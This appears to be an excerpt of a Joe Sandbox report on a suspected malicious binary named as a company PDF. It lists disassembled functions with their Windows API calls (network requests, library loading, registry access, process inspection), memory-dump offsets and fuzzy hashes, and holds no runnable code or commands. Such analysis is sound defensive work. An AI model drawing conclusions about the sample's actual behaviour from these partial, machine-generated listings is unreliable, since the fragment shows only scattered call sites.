                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 4152858687-4108050209
                                                                                                                      • Opcode ID: c2b85f31eb3a73a301b39a94fc326b151360276ae0e79e114914272518fc59ee
                                                                                                                      • Instruction ID: aa5b71d039dbe1abc597c72c3a7678a217711a1ca0b522f03c721e97cdb2f8dd
                                                                                                                      • Opcode Fuzzy Hash: c2b85f31eb3a73a301b39a94fc326b151360276ae0e79e114914272518fc59ee
                                                                                                                      • Instruction Fuzzy Hash: 6C51F2316097089AD714AF28C849BEBB7E9EF44360F044A2DF895D3191EB78CE85C752
                                                                                                                      Function 007B2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007B2CAF
                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007B2CCB
                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 007B2D11
                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00816890,00000000), ref: 007B2D5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                      • Opcode ID: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                                                                                                                      • Instruction ID: ae975927ba7c6b4e14ad145effb99b42a37db193ad71563d934d4b96384043d3
                                                                                                                      • Opcode Fuzzy Hash: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                                                                                                                      • Instruction Fuzzy Hash: C341B4302063019FD714DF24D849B9BBBE4FF85320F14465EF96697292DB78E906CBA2
                                                                                                                      Function 007CDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CDAD9
                                                                                                                        • Part of subcall function 007579AB: _memmove.LIBCMT ref: 007579F9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower_memmove
                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                      • API String ID: 3425801089-567219261
                                                                                                                      • Opcode ID: 0bb4c100ba30a4dc35544add5c327f24b6adabb40dbeca9c50eac49620a653a4
                                                                                                                      • Instruction ID: a3cb418f35b7d611030d3e0ff669b5f33ad206164080fdd79f97aaac6832cac7
                                                                                                                      • Opcode Fuzzy Hash: 0bb4c100ba30a4dc35544add5c327f24b6adabb40dbeca9c50eac49620a653a4
                                                                                                                      • Instruction Fuzzy Hash: EE317270600619EBCF20EFA4CC959EEB7B4FF05310B10862DE866A76D1DB75AD09CB90
                                                                                                                      Function 007A9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007A93F6
                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007A9409
                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 007A9439
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 365058703-1403004172
                                                                                                                      • Opcode ID: 0fe36818224dbedad1badcc70a5a582c21a1f5271a2602a24330ea7e22385c8b
                                                                                                                      • Instruction ID: 0b59d862ae501419f034b75bd22afaa5be4b32d1f958f975592c5c5e26b9ce13
                                                                                                                      • Opcode Fuzzy Hash: 0fe36818224dbedad1badcc70a5a582c21a1f5271a2602a24330ea7e22385c8b
                                                                                                                      • Instruction Fuzzy Hash: 1521E4B1A00104FEDB18AB74DC8ACFFB778DF46350B108219FA26972E1DB7D490A9620
                                                                                                                      Function 007C1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C1B40
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C1B66
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007C1B96
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 007C1BDD
                                                                                                                        • Part of subcall function 007C2777: GetLastError.KERNEL32(?,?,007C1B0B,00000000,00000000,00000001), ref: 007C278C
                                                                                                                        • Part of subcall function 007C2777: SetEvent.KERNEL32(?,?,007C1B0B,00000000,00000000,00000001), ref: 007C27A1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                      • Opcode ID: c435dcf97b12d6c50db58b02d6c7d390d421ec98ff0d02accadaf8609d14b08d
                                                                                                                      • Instruction ID: 1ab2b7f098c228eb887ddeecf90fa53ee8abccf35f074c0eccbce6dd159749be
                                                                                                                      • Opcode Fuzzy Hash: c435dcf97b12d6c50db58b02d6c7d390d421ec98ff0d02accadaf8609d14b08d
                                                                                                                      • Instruction Fuzzy Hash: 72218EB1500208BFEB119F609CC9FBB77FCEB4A754F50812EF506A6241EB289D059B61
                                                                                                                      Function 007D6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                                        • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                                        • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007D66D0
                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 007D66D7
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007D66EC
                                                                                                                      • DestroyWindow.USER32(?), ref: 007D66F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                      • Opcode ID: 9a3fb58cd74794dc0bea08ee61c6e2150bc40358f0098e9ac2583fac8f7ba6c0
                                                                                                                      • Instruction ID: 17c8fbc9eb94374af053188353fe3354666381fa34e3e11e69085efd6e384c1d
                                                                                                                      • Opcode Fuzzy Hash: 9a3fb58cd74794dc0bea08ee61c6e2150bc40358f0098e9ac2583fac8f7ba6c0
                                                                                                                      • Instruction Fuzzy Hash: 31219D7120020AEFEF105F64EC80EBB37BDEF59368F10862AF951922A0D779CC519760
                                                                                                                      Function 007B703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 007B705E
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B7091
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 007B70A3
                                                                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007B70DD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: 9a28d53cbdf8847e079c8dde2eb10fce30331c61afde1a27779be8a404536b80
                                                                                                                      • Instruction ID: 94d7f66e2936853ef01d3a93c04ff98e062c87c9db54005e9525992c06764176
                                                                                                                      • Opcode Fuzzy Hash: 9a28d53cbdf8847e079c8dde2eb10fce30331c61afde1a27779be8a404536b80
                                                                                                                      • Instruction Fuzzy Hash: EA215174604209AFDB24AF38DC09BEA77B8BF94720F20861AFDA1D72D0D7789950CB50
                                                                                                                      Function 007B710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 007B712B
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B715D
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 007B716E
                                                                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007B71A8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: 34bc275bf3644db9498c83c9c99e1f9c9bb8b2a2db8dc1f19f022c5e1d1b94f4
                                                                                                                      • Instruction ID: f8caef5ff0244f46bea2c13eabfbab7b3a09a1e2bc823d69ad0872d8010d1ffa
                                                                                                                      • Opcode Fuzzy Hash: 34bc275bf3644db9498c83c9c99e1f9c9bb8b2a2db8dc1f19f022c5e1d1b94f4
                                                                                                                      • Instruction Fuzzy Hash: 8221907560420DABDB249F6C9C04BEAB7B8BFD5720F204619F9A1D32D0D778A841CB64
                                                                                                                      Function 007BAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 007BAEBF
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007BAF13
                                                                                                                      • __swprintf.LIBCMT ref: 007BAF2C
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,007DF910), ref: 007BAF6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu
                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                      • Opcode ID: b5a30ebd16c610a22291dae0b7c842d0a486a91597ff67678df004503bb07aa2
                                                                                                                      • Instruction ID: 418c0574649626deeb44b986c82a03017251bbb8861e6ab7f2e3bb75857be98b
                                                                                                                      • Opcode Fuzzy Hash: b5a30ebd16c610a22291dae0b7c842d0a486a91597ff67678df004503bb07aa2
                                                                                                                      • Instruction Fuzzy Hash: B6216270A00109EFCB10EF64C989EEE7BB8EF89704B008069F909DB251DB75EA45CB61
                                                                                                                      Function 007AA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                        • Part of subcall function 007AA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AA399
                                                                                                                        • Part of subcall function 007AA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA3AC
                                                                                                                        • Part of subcall function 007AA37C: GetCurrentThreadId.KERNEL32 ref: 007AA3B3
                                                                                                                        • Part of subcall function 007AA37C: AttachThreadInput.USER32(00000000), ref: 007AA3BA
                                                                                                                      • GetFocus.USER32 ref: 007AA554
                                                                                                                        • Part of subcall function 007AA3C5: GetParent.USER32(?), ref: 007AA3D3
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 007AA59D
                                                                                                                      • EnumChildWindows.USER32(?,007AA615), ref: 007AA5C5
                                                                                                                      • __swprintf.LIBCMT ref: 007AA5DF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                      • String ID: %s%d
                                                                                                                      • API String ID: 1941087503-1110647743
                                                                                                                      • Opcode ID: d678a122264c6eab733bcb878069dcb1fcab10b62820034282eac1820081146f
                                                                                                                      • Instruction ID: 4e2f3e676be4570a162f2f395289ef2641b8990b6a5f9e6486c9b93f41dcc474
                                                                                                                      • Opcode Fuzzy Hash: d678a122264c6eab733bcb878069dcb1fcab10b62820034282eac1820081146f
                                                                                                                      • Instruction Fuzzy Hash: 2911B471600208BBDF11BF60DC89FEA3778AF8A701F048175FD09AA152CB795945CB75
                                                                                                                      Function 007B2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 007B2048
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                      • API String ID: 3964851224-769500911
                                                                                                                      • Opcode ID: ec60460ba97184aa47f86de45eb588ad6371133ebd9628150875a7dda1d277bf
                                                                                                                      • Instruction ID: 0343116228eaa503ab50bdffc7941188c15223da21dbb1e6b46bdbaf3444647c
                                                                                                                      • Opcode Fuzzy Hash: ec60460ba97184aa47f86de45eb588ad6371133ebd9628150875a7dda1d277bf
                                                                                                                      • Instruction Fuzzy Hash: E3116D30911209DFCF14EFB8D8515EEB7B4FF19304B208869D856A7292EB36690BCB90
                                                                                                                      Function 007CEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007CEF1B
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007CEF4B
                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007CF07E
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007CF0FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2364364464-0
                                                                                                                      • Opcode ID: aa84a6736496e7738b5c197295f7704b26866f73f107a403a9a6451b156225c9
                                                                                                                      • Instruction ID: e3c6ee75f5d375c4a7dcee08c08e510ab171554272754bec093e922c93ce8ef7
                                                                                                                      • Opcode Fuzzy Hash: aa84a6736496e7738b5c197295f7704b26866f73f107a403a9a6451b156225c9
                                                                                                                      • Instruction Fuzzy Hash: 28817371604700DFD720DF28C84AF6AB7E5AF88B10F14881DF996DB292DBB9AD44CB51
                                                                                                                      Function 007D02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0388
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D03C7
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007D040E
                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 007D043A
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 007D0447
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3440857362-0
                                                                                                                      • Opcode ID: 6242102c56ea99c255dfc4b37479b2d8ef4cfea8fe7770fbd8ce46c3dfccf9ef
                                                                                                                      • Instruction ID: ed15c5fbd81e45421d89b345d6a0e6d8676fc87a2df8768776aea744f3be627b
                                                                                                                      • Opcode Fuzzy Hash: 6242102c56ea99c255dfc4b37479b2d8ef4cfea8fe7770fbd8ce46c3dfccf9ef
                                                                                                                      • Instruction Fuzzy Hash: 59513B71208244EFD704EB64D885FAAB7F8FF84314F44892EF59687291DB78E909CB52
                                                                                                                      Function 007CDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDC3B
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 007CDCBE
                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 007CDCDA
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 007CDD1B
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDD35
                                                                                                                        • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                                                                                                                        • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
